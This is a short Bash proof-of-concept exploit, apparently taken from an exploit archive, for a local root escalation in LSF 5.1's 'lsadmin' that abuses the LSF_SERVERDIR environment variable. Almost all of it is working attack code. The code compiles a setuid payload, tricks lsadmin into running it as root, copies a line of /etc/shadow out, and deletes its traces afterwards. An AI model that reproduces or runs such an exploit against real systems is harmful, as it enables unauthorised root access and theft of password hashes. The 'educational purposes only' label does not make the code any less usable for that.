30 lines
No EOL
851 B
Bash
Executable file
30 lines
No EOL
851 B
Bash
Executable file
source: https://www.securityfocus.com/bid/7655/info
|
|
|
|
It has been reported that Load Sharing Facility (LSF) does not properly handle input in environment variables. Because of this, an attacker may be able to gain escalated privileges on a vulnerable system.
|
|
|
|
# LSF 5.1 'lsadmin' local root exploit
|
|
# 2003.03.20 - CADENCE of Lam3rZ
|
|
|
|
# Proof of concept - for educational purposes only!
|
|
|
|
cat <<__END__> attacker_code.c
|
|
#include <stdio.h>
|
|
int main() {
|
|
FILE *secret_file;
|
|
FILE *temp_file;
|
|
char one_line[128];
|
|
setuid(0);setgid(0);
|
|
secret_file = fopen("/etc/shadow", "r");
|
|
temp_file = fopen(".temp.file", "w");
|
|
fgets(one_line, 120, secret_file);
|
|
fputs(one_line, temp_file);
|
|
fclose(secret_file); fclose (temp_file);
|
|
}
|
|
__END__
|
|
|
|
gcc attacker_code.c -o lim
|
|
chmod 777 lim
|
|
export LSF_SERVERDIR=.
|
|
lsadmin ckconfig
|
|
cat .temp.file
|
|
rm -f attacker_code.c lim .temp.file |